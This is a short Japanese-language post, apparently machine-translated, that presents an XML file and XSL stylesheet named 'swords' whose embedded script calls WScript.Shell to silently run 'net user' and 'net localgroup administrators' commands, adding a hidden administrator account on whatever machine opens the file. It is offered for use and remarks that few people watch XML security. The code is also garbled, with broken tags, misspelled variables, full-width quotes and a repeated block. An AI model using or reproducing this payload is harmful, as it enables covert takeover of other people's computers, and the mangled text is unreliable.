xml+xslを利用して、お客様にスーパー管理口座を追加します。
使い方:swords.xmlとswords.xslを普通の空間に置いて、xmlの安全性に注意する人は少ないと思います。ga、実行したいプログラムをrunに追加すればいいです。標準ではjsとvbsをサポートします。このプログラムにはユーザーをswordsとして追加しました。パスワードはestの超級管理者のアカウントです。
swords.xml
<?xml version=「1.0」encoding=「GB 2312」?xml-styless type=「text/xsl」href=「sword.xsl」?name>Iam swords,I am admin!swods.xsl
<?xml version=「1.0」encoding=「gb 2312」?xsl:styless heet xmlns:xsl="http://www.w3.org/TR/WD-xsl"funcrun(){vawsh;var wush=new ActiveXObject(「WScript.Shell」);wsh.run(「net user swords est/add」、0)wsh.run(「net localgroup administrators/add」、0)wsh.run(「cmd.exe/c echo test!」) run()
swords.xml
<?xml version=「1.0」encoding=「GB 2312」?xml-styless type=「text/xsl」href=「sword.xsl」?name>Iam swords,I am admin!swods.xsl
<?xml version=「1.0」encoding=「gb 2312」?xsl:styless heet xmlns:xsl="http://www.w3.org/TR/WD-xsl"